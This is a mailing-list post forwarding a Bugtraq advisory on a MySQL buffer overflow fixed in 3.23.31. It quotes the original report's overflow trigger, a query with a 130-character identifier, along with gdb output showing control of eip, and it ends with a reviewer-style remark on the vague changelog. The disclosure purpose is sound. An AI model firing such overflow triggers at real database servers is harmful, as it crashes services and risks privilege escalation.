Howdy! Just for us MySQL users I'm forwarding this from bugtraq.

Ragnar

>Hi,
>
>All versions of MySQL < 3.23.31 have a buffer overflow which crashes the
>server and which seems to be exploitable (i.e. 41414141 in eip).
>
>Problem:
>An attacker could gain mysqld privileges (gaining access to all the
>databases).
>
>Requirements:
>You need a valid login/password to exploit this.
>
>Solution:
>Upgrade to 3.23.31.
>
>Proof-of-concept code:
>None
>
>Credits:
>I'm not the discoverer of this bug.
>The first public report was made by [EMAIL PROTECTED] via the MySQL
>mailing list.
>See the following mails for details.
>
>Regards,
>Nicob
>
>Here is the original post to the MySQL mailing list:
>==================================================
>
>On Jan 12, João Gouveia wrote:
>> Hi,
>>
>> I believe I've found a problem in MySQL. Here are some tests I've made on
>> 3.22.27 x86 (also tested on v3.22.32 - latest stable, although I didn't
>> debug it, just tested to see if it crashes). Confirmed up to latest 3.23.
>>
>> On one terminal:
>> <quote>
>> spike:/var/mysql # /sbin/init.d/mysql start
>> Starting service MySQL.
>> Starting mysqld daemon with databases from /var/mysql
>> done
>> spike:/var/mysql #
>> </quote>
>>
>> On the other terminal:
>> <quote>
>> jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'
>> Enter password:
>> (hanged..^C)
>> </quote>
>>
>> On the first terminal I got:
>> <quote>
>> spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
>> nohup $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-locking "$@" >>$err_log 2>&1
>> Number of processes running now: 0
>> mysqld restarted on Fri Jan 12 07:10:54 WET 2001
>> mysqld daemon ended
>> </quote>
>>
>> gdb shows the following:
>> <quote>
>> (gdb) run
>> Starting program: /usr/sbin/mysqld
>> [New Thread 16897 (manager thread)]
>> [New Thread 16891 (initial thread)]
>> [New Thread 16898]
>> /usr/sbin/mysqld: ready for connections
>> [New Thread 16916]
>> [Switching to Thread 16916]
>>
>> Program received signal SIGSEGV, Segmentation fault.
>> 0x41414141 in ?? ()
>> (gdb) info all-registers
>> eax            0x1          1
>> ecx            0x68         104
>> edx            0x8166947    135686471
>> ebx            0x41414141   1094795585
>> esp            0xbf5ff408   0xbf5ff408
>> ebp            0x41414141   0x41414141
>> esi            0x41414141   1094795585
>> edi            0x0          0
>> eip            0x41414141   0x41414141
>> eflags         0x10246      66118
>> cs             0x23         35
>> ss             0x2b         43
>> ds             0x2b         43
>> es             0x2b         43
>> fs             0x0          0
>> gs             0x0          0
>> (gdb)
>> </quote>
>>
>> Looks like a typical overflow to me.
>> Please reply asap, at least to tell me I'm not seeing things. :-)
>>
>> Best regards,
>>
>> Joao Gouveia aka Tharbad.
>>
>> [EMAIL PROTECTED]
>
>Here is the response to an email I sent today to the MySQL list:
>============================================================
>
>Sergei Golubchik (MySQL team) wrote:
>>
>> Hi!
>>
>> On Jan 18, Nicolas GREGOIRE wrote:
>> > Hi,
>> >
>> > Still no info about the buffer overflow discovered last week?
>> > Shouldn't it be fixed at the beginning of the week?
>> >
>> > Please, dear MySQL team, give us info!!
>> >
>> > Regards,
>> > Nicob
>>
>> Fixed in latest release (3.23.31).
>>
>> Regards,
>> Sergei
>
>Here is a part of the 3.23.30 to 3.23.31 diff:
>=============================================
>
>+Changes in release 3.23.31
>+--------------------------
>+
>+ * Fixed security bug in something (please upgrade if you are using a
>+ earlier MySQL 3.23 version).

_______________________________________________
Zope maillist - [EMAIL PROTECTED]
http://lists.zope.org/mailman/listinfo/zope
** No cross posts or HTML encoding! **
(Related lists -
 http://lists.zope.org/mailman/listinfo/zope-announce
 http://lists.zope.org/mailman/listinfo/zope-dev )
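Review bot: the changelog entry "Fixed security bug in something" names neither the component that was fixed nor the input that triggers it, so an operator reading the release notes cannot tell whether their build is affected or verify the fix; state that it is the server-side overflow reached through an over-long identifier in a query (the `select a.<130 x 'A'>.b` probe reported on the list, which leaves 0x41414141 in eip) and list the affected 3.23 versions explicitly. Minor: "a earlier" should read "an earlier".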